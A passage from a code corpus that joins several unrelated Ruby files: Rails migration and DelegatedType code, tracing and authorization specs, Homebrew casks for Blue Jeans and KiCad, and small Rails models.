assert_equal string, TestModel.new.command
end
def test_add_remove_single_field_using_string_arguments
assert_no_column TestModel, :last_name
add_column "test_models", "last_name", :string
assert_column TestModel, :last_name
remove_column "test_models", "last_name"
assert_no_column TestModel, :last_name
end
def test_add_remove_single_field_using_symbol_arguments
assert_no_column TestModel, :last_name
add_column :test_models, :last_name, :string
assert_column TestModel, :last_name
remove_column :test_models, :last_name
assert_no_column TestModel, :last_name
end
def test_add_column_without_limit
# TODO: limit: nil should work with all adapters.
skip "MySQL wrongly enforces a limit of 255" if current_adapter?(:Mysql2Adapter)
add_column :test_models, :description, :string, limit: nil
TestModel.reset_column_information
assert_nil TestModel.columns_hash["description"].limit
end
if current_adapter?(:Mysql2Adapter)
def test_unabstracted_database_dependent_types
add_column :test_models, :intelligence_quotient, :tinyint
TestModel.reset_column_information
assert_match(/tinyint/, TestModel.columns_hash["intelligence_quotient"].sql_type)
end
end
unless current_adapter?(:SQLite3Adapter)
# We specifically do a manual INSERT here, and then test only the SELECT
# functionality. This allows us to more easily catch INSERT being broken,
# but SELECT actually working fine.
def test_native_decimal_insert_manual_vs_automatic
correct_value = "0012345678901234567890.0123456789".to_d
connection.add_column "test_models", "wealth", :decimal, precision: "30", scale: "10"
# Do a manual insertion
if current_adapter?(:OracleAdapter)
connection.execute "insert into test_models (id, wealth) values (people_seq.nextval, 12345678901234567890.0123456789)"
elsif current_adapter?(:PostgreSQLAdapter)
connection.execute "insert into test_models (wealth) values (12345678901234567890.0123456789)"
else
connection.execute "insert into test_models (wealth) values (12345678901234567890.0123456789)"
end
# SELECT
row = TestModel.first
assert_kind_of BigDecimal, row.wealth
# If this assert fails, that means the SELECT is broken!
unless current_adapter?(:SQLite3Adapter)
assert_equal correct_value, row.wealth
end
# Reset to old state
TestModel.delete_all
# Now use the Rails insertion
TestModel.create wealth: BigDecimal.new("12345678901234567890.0123456789")
# SELECT
row = TestModel.first
assert_kind_of BigDecimal, row.wealth
# If these asserts fail, that means the INSERT (create function, or cast to SQL) is broken!
assert_equal correct_value, row.wealth
end
end
def test_add_column_with_precision_and_scale
connection.add_column "test_models", "wealth", :decimal, precision: 9, scale: 7
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
end
if current_adapter?(:SQLite3Adapter)
def test_change_column_preserve_other_column_precision_and_scale
connection.add_column "test_models", "last_name", :string
connection.add_column "test_models", "wealth", :decimal, precision: 9, scale: 7
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
connection.change_column "test_models", "last_name", :string, null: false
TestModel.reset_column_information
wealth_column = TestModel.columns_hash["wealth"]
assert_equal 9, wealth_column.precision
assert_equal 7, wealth_column.scale
end
end
unless current_adapter?(:SQLite3Adapter)
def test_native_types
add_column "test_models", "first_name", :string
add_column "test_models", "last_name", :string
add_column "test_models", "bio", :text
add_column "test_models", "age", :integer
add_column "test_models", "height", :float
add_column "test_models", "wealth", :decimal, precision: "30", scale: "10"
add_column "test_models", "birthday", :datetime
add_column "test_models", "favorite_day", :date
add_column "test_models", "moment_of_truth", :datetime
add_column "test_models", "male", :boolean
TestModel.create first_name: "bob", last_name: "bobsen",
bio: "I was born ....", age: 18, height: 1.78,
wealth: BigDecimal.new("12345678901234567890.0123456789"),
birthday: 18.years.ago, favorite_day: 10.days.ago,
moment_of_truth: "1782-10-10 21:40:18", male: true
bob = TestModel.first
assert_equal "bob", bob.first_name
assert_equal "bobsen", bob.last_name
assert_equal "I was born ....", bob.bio
assert_equal 18, bob.age
# Test for 30 significant digits (beyond the 16 of float), 10 of them
# after the decimal place.
assert_equal BigDecimal.new("0012345678901234567890.0123456789"), bob.wealth
assert_equal true, bob.male?
assert_equal String, bob.first_name.class
assert_equal String, bob.last_name.class
assert_equal String, bob.bio.class
assert_kind_of Integer, bob.age
assert_equal Time, bob.birthday.class
assert_equal Date, bob.favorite_day.class
assert_instance_of TrueClass, bob.male?
assert_kind_of BigDecimal, bob.wealth
end
end
if current_adapter?(:Mysql2Adapter, :PostgreSQLAdapter)
def test_out_of_range_limit_should_raise
assert_raise(ActiveRecordError) { add_column :test_models, :integer_too_big, :integer, limit: 10 }
unless current_adapter?(:PostgreSQLAdapter)
assert_raise(ActiveRecordError) { add_column :test_models, :text_too_big, :integer, limit: 0xfffffffff }
end
end
end
end
end
end
| 38.813559 | 130 | 0.673071 |
62f3c5e01b271bc4243569af51b92d40f1ef689c | 331 | class Spree::VolumePriceModel < ActiveRecord::Base
has_many :variants
has_many :volume_prices, -> { order(position: :asc) }, dependent: :destroy
accepts_nested_attributes_for :volume_prices, allow_destroy: true,
reject_if: proc { |volume_price|
volume_price[:amount].blank? && volume_price[:range].blank?
}
end
| 36.777778 | 76 | 0.734139 |
e2e5d60e05d945bd7dc21a564ad5c8e64127b344 | 6,088 | require 'spec_helper'
require 'ddtrace/contrib/analytics_examples'
require 'racecar'
require 'racecar/cli'
require 'active_support'
require 'ddtrace'
RSpec.describe 'Racecar patcher' do
let(:tracer) { get_test_tracer }
let(:configuration_options) { { tracer: tracer } }
def all_spans
tracer.writer.spans(:keep)
end
before(:each) do
Datadog.configure do |c|
c.use :racecar, configuration_options
end
end
around do |example|
# Reset before and after each example; don't allow global state to linger.
Datadog.registry[:racecar].reset_configuration!
example.run
Datadog.registry[:racecar].reset_configuration!
end
describe 'for single message processing' do
let(:topic) { 'dd_trace_test_dummy' }
let(:consumer) { 'DummyConsumer' }
let(:partition) { 1 }
let(:offset) { 2 }
let(:payload) do
{
consumer_class: consumer,
topic: topic,
partition: partition,
offset: offset
}
end
let(:span) do
all_spans.select { |s| s.name == Datadog::Contrib::Racecar::Ext::SPAN_MESSAGE }.first
end
context 'that doesn\'t raise an error' do
it 'is expected to send a span' do
ActiveSupport::Notifications.instrument('process_message.racecar', payload)
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.message')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.first_offset')).to be nil
expect(span.status).to_not eq(Datadog::Ext::Errors::STATUS)
end
end
end
context 'that raises an error' do
let(:error_class) { Class.new(StandardError) }
it 'is expected to send a span' do
# Emulate failure
begin
ActiveSupport::Notifications.instrument('process_message.racecar', payload) do
raise error_class
end
rescue error_class
nil
end
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.message')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.first_offset')).to be nil
expect(span.status).to eq(Datadog::Ext::Errors::STATUS)
end
end
end
it_behaves_like 'analytics for integration' do
before { ActiveSupport::Notifications.instrument('process_message.racecar', payload) }
let(:analytics_enabled_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_ENALBED }
let(:analytics_sample_rate_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_SAMPLE_RATE }
end
end
describe 'for batch message processing' do
let(:topic) { 'dd_trace_test_dummy_batch' }
let(:consumer) { 'DummyBatchConsumer' }
let(:partition) { 1 }
let(:offset) { 2 }
let(:message_count) { 5 }
let(:payload) do
{
consumer_class: consumer,
topic: topic,
partition: partition,
message_count: message_count,
first_offset: offset
}
end
let(:span) do
all_spans.select { |s| s.name == Datadog::Contrib::Racecar::Ext::SPAN_BATCH }.first
end
context 'that doesn\'t raise an error' do
it 'is expected to send a span' do
ActiveSupport::Notifications.instrument('process_batch.racecar', payload)
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.batch')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to be nil
expect(span.get_tag('kafka.first_offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.message_count')).to eq(message_count.to_s)
expect(span.status).to_not eq(Datadog::Ext::Errors::STATUS)
end
end
end
context 'that raises an error' do
let(:error_class) { Class.new(StandardError) }
it 'is expected to send a span' do
begin
ActiveSupport::Notifications.instrument('process_batch.racecar', payload) do
raise error_class
end
rescue error_class
nil
end
span.tap do |span|
expect(span).to_not be nil
expect(span.service).to eq('racecar')
expect(span.name).to eq('racecar.batch')
expect(span.resource).to eq(consumer)
expect(span.get_tag('kafka.topic')).to eq(topic)
expect(span.get_tag('kafka.consumer')).to eq(consumer)
expect(span.get_tag('kafka.partition')).to eq(partition.to_s)
expect(span.get_tag('kafka.offset')).to be nil
expect(span.get_tag('kafka.first_offset')).to eq(offset.to_s)
expect(span.get_tag('kafka.message_count')).to eq(message_count.to_s)
expect(span.status).to eq(Datadog::Ext::Errors::STATUS)
end
end
end
it_behaves_like 'analytics for integration' do
before { ActiveSupport::Notifications.instrument('process_batch.racecar', payload) }
let(:analytics_enabled_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_ENALBED }
let(:analytics_sample_rate_var) { Datadog::Contrib::Racecar::Ext::ENV_ANALYTICS_SAMPLE_RATE }
end
end
end
| 34.590909 | 99 | 0.639783 |
0823fca7ca22e51d53e144af4e0da0a3565b867e | 579 | cask 'blue-jeans' do
version '2.5.1.33'
sha256 '20914226694e4a0734d85f8de9a42bc81e7166af933016de66e0a82dd5383e89'
url "https://swdl.bluejeans.com/desktop-app/mac/#{version.major_minor_patch}/#{version}/BlueJeansInstaller.dmg"
name 'Blue Jeans videoconferencing'
homepage 'https://www.bluejeans.com/'
installer manual: 'BlueJeansInstaller.app'
uninstall signal: [
['TERM', 'com.bluejeansnet.Blue'],
['TERM', 'com.bluejeansnet.BlueMenulet'],
],
delete: '/Applications/Blue Jeans.app'
end
| 34.058824 | 113 | 0.658031 |
f74b643d2bc39b0986020b85ee2af6ec03d276fa | 533 | require 'rubytunes/playback'
class RubyTunes
class Fade
INCREMENT = 5
def toggle; volume > 0 ? self.out : self.in end
def in
while (current ||= volume) < 100
self.volume = (current += INCREMENT)
end
end
def out
while (current ||= volume) > 0
self.volume = (current -= INCREMENT)
end
end
private
def volume; playback.volume end
def volume=(volume); playback.volume = volume end
def playback; @playback ||= RubyTunes::Playback.new end
end
end
| 16.65625 | 59 | 0.606004 |
3898f3395b970354247db4cc8014d57d2a9e16bc | 1,544 | cask "kicad" do
version "5.1.8-0"
sha256 "a8edcae34a19afbec3c8b7ec4e38ada4d19c0c6a73a94d2f2f4e8f5b48278bbd"
# kicad-downloads.s3.cern.ch/ was verified as official when first introduced to the cask
url "https://kicad-downloads.s3.cern.ch/osx/stable/kicad-unified-#{version}-10_14.dmg"
appcast "https://kicad-downloads.s3.cern.ch/?delimiter=/&prefix=osx/stable/"
name "KiCad"
desc "Electronics design automation suite"
homepage "https://kicad.org/"
depends_on macos: ">= :mojave"
app "KiCad/kicad.app", target: "KiCad/KiCad.app"
app "KiCad/bitmap2component.app", target: "KiCad/bitmap2component.app"
app "KiCad/eeschema.app", target: "KiCad/eeschema.app"
app "KiCad/gerbview.app", target: "KiCad/gerbview.app"
app "KiCad/pcb_calculator.app", target: "KiCad/pcb_calculator.app"
app "KiCad/pcbnew.app", target: "KiCad/pcbnew.app"
app "KiCad/pl_editor.app", target: "KiCad/pl_editor.app"
artifact "kicad/help", target: "/Library/Application Support/kicad/help"
artifact "kicad/library", target: "/Library/Application Support/kicad/library"
artifact "kicad/modules", target: "/Library/Application Support/kicad/modules"
artifact "kicad/share", target: "/Library/Application Support/kicad/share"
artifact "kicad/template", target: "/Library/Application Support/kicad/template"
uninstall rmdir: [
"/Library/Application Support/kicad",
"#{appdir}/KiCad",
]
zap trash: "~/Library/Preferences/kicad"
end
| 45.411765 | 90 | 0.697539 |
4a2a1f3981b716df394b5ce4220b0291fd894406 | 8,143 | # frozen_string_literal: true
require_relative './helpers'
require 'sqlite3'
require 'active_record'
DB_FILE = 'gitclub_test.db'
RSpec.describe Oso::Oso do # rubocop:disable Metrics/BlockLength
context 'a github clone' do # rubocop:disable Metrics/BlockLength
context 'org members' do
it 'can access the right resources' do
# steve is a member of osohq
check_authz steve, 'read', Org, [osohq]
check_authz steve, 'list_repos', Org, [osohq]
check_authz steve, 'create_repos', Org, []
check_authz steve, 'read', Repo, [oso, demo]
check_authz steve, 'push', Repo, []
check_authz steve, 'pull', Repo, [oso, demo]
check_authz steve, 'create_issues', Repo, []
check_authz steve, 'list_issues', Repo, [oso, demo]
check_authz steve, 'read', Issue, [bug]
check_authz steve, 'edit', Issue, []
end
end
context 'org owners' do
it 'can access the right resources' do
# leina is an owner of osohq
check_authz leina, 'read', Org, [osohq]
check_authz leina, 'list_repos', Org, [osohq]
check_authz leina, 'create_repos', Org, [osohq]
check_authz leina, 'read', Repo, [oso, demo]
check_authz leina, 'push', Repo, [oso, demo]
check_authz leina, 'pull', Repo, [oso, demo]
check_authz leina, 'create_issues', Repo, [oso, demo]
check_authz leina, 'list_issues', Repo, [oso, demo]
check_authz leina, 'read', Issue, [bug]
check_authz leina, 'edit', Issue, [bug]
end
end
context 'repo readers' do
it 'can access the right resources' do
# graham owns apple and has read access to demo
check_authz graham, 'read', Org, [apple]
check_authz graham, 'list_repos', Org, [apple]
check_authz graham, 'create_repos', Org, [apple]
check_authz graham, 'read', Repo, [ios, demo]
check_authz graham, 'push', Repo, [ios]
check_authz graham, 'pull', Repo, [ios, demo]
check_authz graham, 'create_issues', Repo, [ios]
check_authz graham, 'list_issues', Repo, [ios, demo]
check_authz graham, 'read', Issue, [laggy]
check_authz graham, 'edit', Issue, [laggy]
end
end
context 'repo writers' do
it 'can access the right resources' do
# gabe has write access to oso
check_authz gabe, 'read', Org, []
check_authz gabe, 'list_repos', Org, []
check_authz gabe, 'create_repos', Org, []
check_authz gabe, 'read', Repo, [oso]
check_authz gabe, 'push', Repo, [oso]
check_authz gabe, 'pull', Repo, [oso]
check_authz gabe, 'create_issues', Repo, [oso]
check_authz gabe, 'list_issues', Repo, [oso]
check_authz gabe, 'read', Issue, [bug]
check_authz gabe, 'edit', Issue, [bug]
end
end
end
let(:policy_file) { File.join(__dir__, 'gitclub.polar') }
let(:apple) { Org.find 'apple' }
let(:osohq) { Org.find 'osohq' }
let(:oso) { Repo.find 'oso' }
let(:demo) { Repo.find 'demo' }
let(:ios) { Repo.find 'ios' }
let(:steve) { User.find 'steve' }
let(:leina) { User.find 'leina' }
let(:gabe) { User.find 'gabe' }
let(:graham) { User.find 'graham' }
let(:bug) { Issue.find 'bug' }
let(:laggy) { Issue.find 'laggy' }
before do # rubocop:disable Metrics/BlockLength
File.delete DB_FILE if File.exist? DB_FILE
SQLite3::Database.new(DB_FILE) do |db| # rubocop:disable Metrics/BlockLength
db.execute <<-SQL
create table orgs (
name varchar(16) not null primary key
);
SQL
db.execute <<-SQL
create table users (
name varchar(16) not null primary key,
org_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table repos (
name varchar(16) not null primary key,
org_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table issues (
name varchar(16) not null primary key,
repo_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table repo_roles (
id integer not null primary key autoincrement,
name varchar(16) not null,
repo_name varchar(16) not null,
user_name varchar(16) not null
);
SQL
db.execute <<-SQL
create table org_roles (
id integer not null primary key autoincrement,
name varchar(16) not null,
org_name varchar(16) not null,
user_name varchar(16) not null
);
SQL
end
ActiveRecord::Base.establish_connection(
adapter: 'sqlite3',
database: DB_FILE
)
# fixtures
apple = Org.create name: 'apple'
osohq = Org.create name: 'osohq'
oso = Repo.create name: 'oso', org: osohq
demo = Repo.create name: 'demo', org: osohq
ios = Repo.create name: 'ios', org: apple
steve = User.create name: 'steve', org: osohq
leina = User.create name: 'leina', org: osohq
gabe = User.create name: 'gabe', org: osohq
graham = User.create name: 'graham', org: apple
OrgRole.create name: 'owner', user: leina, org: osohq
OrgRole.create name: 'member', user: steve, org: osohq
OrgRole.create name: 'owner', user: graham, org: apple
RepoRole.create name: 'writer', user: gabe, repo: oso
RepoRole.create name: 'reader', user: graham, repo: demo
Issue.create name: 'bug', repo: oso
Issue.create name: 'laggy', repo: ios
subject.register_class(
User,
fields: {
name: String,
org_name: String,
org: Relation.new(
kind: 'one',
other_type: 'Org',
my_field: 'org_name',
other_field: 'name'
)
}
)
subject.register_class(
Org,
fields: {
name: String,
users: Relation.new(
kind: 'many',
other_type: 'User',
my_field: 'name',
other_field: 'org_name'
),
repos: Relation.new(
kind: 'many',
other_type: 'Repo',
my_field: 'name',
other_field: 'org_name'
)
}
)
subject.register_class(
Repo,
fields: {
name: String,
org_name: String,
org: Relation.new(
kind: 'one',
other_type: 'Org',
my_field: 'org_name',
other_field: 'name'
),
roles: Relation.new(
kind: 'many',
other_type: 'Role',
my_field: 'name',
other_field: 'user_name'
)
}
)
subject.register_class(
Issue,
fields: {
name: String,
repo_name: String,
repo: Relation.new(
kind: 'one',
other_type: 'Repo',
my_field: 'repo_name',
other_field: 'name'
)
}
)
subject.load_files [policy_file]
end
end
class User < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :org, foreign_key: :org_name
has_many :org_roles, foreign_key: :user_name
has_many :repo_roles, foreign_key: :user_name
end
class Repo < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :org, foreign_key: :org_name
has_many :issues, foreign_key: :repo_name
has_many :repo_roles, foreign_key: :repo_name
end
class Org < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
has_many :users, foreign_key: :org_name
has_many :repos, foreign_key: :org_name
has_many :org_roles, foreign_key: :org_name
end
class Issue < ActiveRecord::Base
include DFH::ActiveRecordFetcher
self.primary_key = :name
belongs_to :repo, foreign_key: :repo_name
end
class RepoRole < ActiveRecord::Base
include DFH::ActiveRecordFetcher
belongs_to :user, foreign_key: :user_name
belongs_to :repo, foreign_key: :repo_name
end
class OrgRole < ActiveRecord::Base
include DFH::ActiveRecordFetcher
belongs_to :user, foreign_key: :user_name
belongs_to :org, foreign_key: :org_name
end
| 28.274306 | 80 | 0.603217 |
1cde7443609016ae7aa2c8cb334becc7d0b0d05b | 107 | require "keima/version"
require "keima/client"
require "json"
module Keima
# Your code goes here...
end
| 13.375 | 26 | 0.728972 |
e2609a85d4b97b085c2cb6839510e4cbfac4362f | 10,035 | # frozen_string_literal: true
require "active_support/core_ext/string/inquiry"
module ActiveRecord
# == Delegated types
#
# Class hierarchies can map to relational database tables in many ways. Active Record, for example, offers
# purely abstract classes, where the superclass doesn't persist any attributes, and single-table inheritance,
# where all attributes from all levels of the hierarchy are represented in a single table. Both have their
# places, but neither are without their drawbacks.
#
# The problem with purely abstract classes is that all concrete subclasses must persist all the shared
# attributes themselves in their own tables (also known as class-table inheritance). This makes it hard to
# do queries across the hierarchy. For example, imagine you have the following hierarchy:
#
# Entry < ApplicationRecord
# Message < Entry
# Comment < Entry
#
# How do you show a feed that has both +Message+ and +Comment+ records, which can be easily paginated?
# Well, you can't! Messages are backed by a messages table and comments by a comments table. You can't
# pull from both tables at once and use a consistent OFFSET/LIMIT scheme.
#
# You can get around the pagination problem by using single-table inheritance, but now you're forced into
# a single mega table with all the attributes from all subclasses. No matter how divergent. If a Message
# has a subject, but the comment does not, well, now the comment does anyway! So STI works best when there's
# little divergence between the subclasses and their attributes.
#
# But there's a third way: Delegated types. With this approach, the "superclass" is a concrete class
# that is represented by its own table, where all the superclass attributes that are shared amongst all the
# "subclasses" are stored. And then each of the subclasses have their own individual tables for additional
# attributes that are particular to their implementation. This is similar to what's called multi-table
# inheritance in Django, but instead of actual inheritance, this approach uses delegation to form the
# hierarchy and share responsibilities.
#
# Let's look at that entry/message/comment example using delegated types:
#
# # Schema: entries[ id, account_id, creator_id, created_at, updated_at, entryable_type, entryable_id ]
# class Entry < ApplicationRecord
# belongs_to :account
# belongs_to :creator
# delegated_type :entryable, types: %w[ Message Comment ]
# end
#
# module Entryable
# extend ActiveSupport::Concern
#
# included do
# has_one :entry, as: :entryable, touch: true
# end
# end
#
# # Schema: messages[ id, subject ]
# class Message < ApplicationRecord
# include Entryable
# has_rich_text :content
# end
#
# # Schema: comments[ id, content ]
# class Comment < ApplicationRecord
# include Entryable
# end
#
# As you can see, neither +Message+ nor +Comment+ are meant to stand alone. Crucial metadata for both classes
# resides in the +Entry+ "superclass". But the +Entry+ absolutely can stand alone in terms of querying capacity
# in particular. You can now easily do things like:
#
# Account.find(1).entries.order(created_at: :desc).limit(50)
#
# Which is exactly what you want when displaying both comments and messages together. The entry itself can
# be rendered as its delegated type easily, like so:
#
# # entries/_entry.html.erb
# <%= render "entries/entryables/#{entry.entryable_name}", entry: entry %>
#
# # entries/entryables/_message.html.erb
# <div class="message">
# Posted on <%= entry.created_at %> by <%= entry.creator.name %>: <%= entry.message.content %>
# </div>
#
# # entries/entryables/_comment.html.erb
# <div class="comment">
# <%= entry.creator.name %> said: <%= entry.comment.content %>
# </div>
#
# == Sharing behavior with concerns and controllers
#
# The entry "superclass" also serves as a perfect place to put all that shared logic that applies to both
# messages and comments, and which acts primarily on the shared attributes. Imagine:
#
# class Entry < ApplicationRecord
# include Eventable, Forwardable, Redeliverable
# end
#
# Which allows you to have controllers for things like +ForwardsController+ and +RedeliverableController+
# that both act on entries, and thus provide the shared functionality to both messages and comments.
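#
# One of those controllers might be sketched roughly like this (hypothetical
# code; +ForwardsController+ is only the illustrative name used above):
#
#   class ForwardsController < ApplicationController
#     def create
#       @entry = Entry.find(params[:id])
#       # Forwarding logic acts on the shared Entry attributes,
#       # so it works for message and comment entries alike.
#     end
#   end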
#
# == Creating new records
#
# You create a new record that uses delegated typing by creating the delegator and delegatee at the same time,
# like so:
#
# Entry.create! entryable: Comment.new(content: "Hello!"), creator: Current.user
#
# If you need more complicated composition, or you need to perform dependent validation, you should build a factory
# method or class to take care of the complicated needs. This could be as simple as:
#
# class Entry < ApplicationRecord
# def self.create_with_comment(content, creator: Current.user)
# create! entryable: Comment.new(content: content), creator: creator
# end
# end
#
# == Adding further delegation
#
# The delegated type shouldn't just answer the question of what the underlying class is called. In fact, that's
# an anti-pattern most of the time. The reason you're building this hierarchy is to take advantage of polymorphism.
# So here's a simple example of that:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ]
# delegate :title, to: :entryable
# end
#
# class Message < ApplicationRecord
# def title
# subject
# end
# end
#
# class Comment < ApplicationRecord
# def title
# content.truncate(20)
# end
# end
#
# Now you can list a bunch of entries, call +Entry#title+, and polymorphism will provide you with the answer.
module DelegatedType
# Defines this as a class that'll delegate its type for the passed +role+ to the class references in +types+.
# That'll create a polymorphic +belongs_to+ relationship to that +role+, and it'll add all the delegated
# type convenience methods:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ], dependent: :destroy
# end
#
# Entry#entryable_class # => +Message+ or +Comment+
# Entry#entryable_name # => "message" or "comment"
# Entry.messages # => Entry.where(entryable_type: "Message")
# Entry#message? # => true when entryable_type == "Message"
# Entry#message # => returns the message record, when entryable_type == "Message", otherwise nil
# Entry#message_id # => returns entryable_id, when entryable_type == "Message", otherwise nil
# Entry.comments # => Entry.where(entryable_type: "Comment")
# Entry#comment? # => true when entryable_type == "Comment"
# Entry#comment # => returns the comment record, when entryable_type == "Comment", otherwise nil
# Entry#comment_id # => returns entryable_id, when entryable_type == "Comment", otherwise nil
#
# You can also declare namespaced types:
#
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment Access::NoticeMessage ], dependent: :destroy
# end
#
# Entry.access_notice_messages
# entry.access_notice_message
# entry.access_notice_message?
#
# === Options
#
# The +options+ are passed directly to the +belongs_to+ call, so this is where you declare +dependent+ etc.
# The following options can be included to specialize the behavior of the delegated type convenience methods.
#
# [:foreign_key]
# Specify the foreign key used for the convenience methods. By default this is guessed to be the passed
# +role+ with an "_id" suffix. So a class that defines a
# <tt>delegated_type :entryable, types: %w[ Message Comment ]</tt> association will use "entryable_id" as
# the default <tt>:foreign_key</tt>.
# [:primary_key]
# Specify the method that returns the primary key of associated object used for the convenience methods.
# By default this is +id+.
#
# Option examples:
# class Entry < ApplicationRecord
# delegated_type :entryable, types: %w[ Message Comment ], primary_key: :uuid, foreign_key: :entryable_uuid
# end
#
# Entry#message_uuid # => returns entryable_uuid, when entryable_type == "Message", otherwise nil
# Entry#comment_uuid # => returns entryable_uuid, when entryable_type == "Comment", otherwise nil
def delegated_type(role, types:, **options)
belongs_to role, options.delete(:scope), **options.merge(polymorphic: true)
define_delegated_type_methods role, types: types, options: options
end
private
def define_delegated_type_methods(role, types:, options:)
primary_key = options[:primary_key] || "id"
role_type = "#{role}_type"
role_id = options[:foreign_key] || "#{role}_id"
define_method "#{role}_class" do
public_send("#{role}_type").constantize
end
define_method "#{role}_name" do
public_send("#{role}_class").model_name.singular.inquiry
end
types.each do |type|
scope_name = type.tableize.gsub("/", "_")
singular = scope_name.singularize
query = "#{singular}?"
scope scope_name, -> { where(role_type => type) }
define_method query do
public_send(role_type) == type
end
define_method singular do
public_send(role) if public_send(query)
end
define_method "#{singular}_#{primary_key}" do
public_send(role_id) if public_send(query)
end
end
end
end
end
| 43.441558 | 117 | 0.677927 |
e877f1a1c7793214a16d3dccbf14c57555a0bc4d | 249 | class AddUnaccentExtension < ActiveRecord::Migration[5.2]
def up
execute "create extension unaccent"
execute "create extension pg_trgm"
end
def down
execute "drop extension unaccent"
execute "drop extension pg_trgm"
end
end
| 20.75 | 57 | 0.73494 |
e8aeb93a2ba3e082336af260b525207745feabc7 | 1,972 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Deploy-ECS.gitlab-ci.yml' do
subject(:template) { Gitlab::Template::GitlabCiYmlTemplate.find('AWS/Deploy-ECS') }
describe 'the created pipeline' do
let(:default_branch) { project.default_branch_or_main }
let(:pipeline_branch) { default_branch }
let(:project) { create(:project, :auto_devops, :custom_repo, files: { 'README.md' => '' }) }
let(:user) { project.owner }
let(:service) { Ci::CreatePipelineService.new(project, user, ref: pipeline_branch ) }
let(:pipeline) { service.execute!(:push) }
let(:build_names) { pipeline.builds.pluck(:name) }
let(:platform_target) { 'ECS' }
before do
create(:ci_variable, project: project, key: 'AUTO_DEVOPS_PLATFORM_TARGET', value: platform_target)
stub_ci_pipeline_yaml_file(template.content)
allow_any_instance_of(Ci::BuildScheduleWorker).to receive(:perform).and_return(true)
allow(project).to receive(:default_branch).and_return(default_branch)
end
shared_examples 'no pipeline yaml error' do
it 'does not have any error' do
expect(pipeline.has_yaml_errors?).to be_falsey
end
end
it_behaves_like 'no pipeline yaml error'
it 'creates the expected jobs' do
expect(build_names).to include('production_ecs')
end
context 'when running a pipeline for a branch' do
let(:pipeline_branch) { 'test_branch' }
before do
project.repository.create_branch(pipeline_branch, default_branch)
end
it_behaves_like 'no pipeline yaml error'
it 'creates the expected jobs' do
expect(build_names).to include('review_ecs', 'stop_review_ecs')
end
context 'when deploying to ECS Fargate' do
let(:platform_target) { 'FARGATE' }
it 'creates the expected jobs' do
expect(build_names).to include('review_fargate', 'stop_review_fargate')
end
end
end
end
end
| 32.866667 | 104 | 0.689655 |
2656f5005960f79b3af61f24468aed221508e748 | 1,946 | class QuickRegistration
include ActiveAttr::Model, PasswordGenerator, HostingServicesGenerators
attribute :domain
attribute :ns1_ip_address
attribute :ns2_ip_address
attribute :user
attribute :login
attribute :email
attribute :apache_variation
attribute :ip_address
attribute :with_ssh, type: Boolean
attribute :with_ftp, type: Boolean
attribute :with_mysql, type: Boolean
attribute :with_pgsql, type: Boolean
attribute :with_email, type: Boolean
include QuickRegistrationValidations
def process_registration
return unless valid?
generate_all_passwords
user = create_user
create_all_services(user)
send_email_to_user(user)
end
private
def generate_all_passwords
@user_password = generate_random_password
@ssh_password = generate_random_password if with_ssh
@ftp_password = generate_random_password if with_ftp
@mysql_password = generate_random_password if with_mysql
@pgsql_password = generate_random_password if with_pgsql
end
def create_all_services(user)
system_user = create_system_user(login: login, user: user)
create_domain(user)
apache = create_apache(system_user: system_user, user: user)
# We really need to create system_user two times. First time it is required
# for apache to be created, second time it updates chroot_directory for
# system_user.
system_user.create_chef_task(:create)
create_ftp(system_user) if with_ftp
create_mysql(apache) if with_mysql
create_pgsql(apache) if with_pgsql
create_email if with_email
end
def send_email_to_user(user)
NotificationsMailer.registration(
email: user.email,
login: login,
user_password: @user_password,
domain: domain,
ssh_password: @ssh_password,
ftp_password: @ftp_password,
mysql_password: @mysql_password,
pgsql_password: @pgsql_password
).deliver_now
end
end
| 27.8 | 79 | 0.750257 |
1a0f3be4f497fab83cb6e49241b2acad39e26564 | 869 | class Workshop < ApplicationRecord
geocoded_by :address
after_validation :geocode, if: :will_save_change_to_address?
include PgSearch
pg_search_scope :search_by_category, :against => [:category]
pg_search_scope :search_by_area, :against => [:area]
acts_as_votable
mount_uploader :photo, PhotoUploader
validates :name, presence: true, uniqueness: true
validates :area, presence: true
validates :capacity, numericality: { only_integer: true }
validates :price, numericality: { only_integer: true }
has_many :bookings, dependent: :destroy
has_many :notes, dependent: :destroy
belongs_to :user, optional: true
CATEGORIES = %w(audio
ceramics
design
digital
drawing
nature
music
online
painting
photography
printmaking
video
performance
social
textiles
theory
reading
tour
writing
sculpture
woodwork
other
)
end
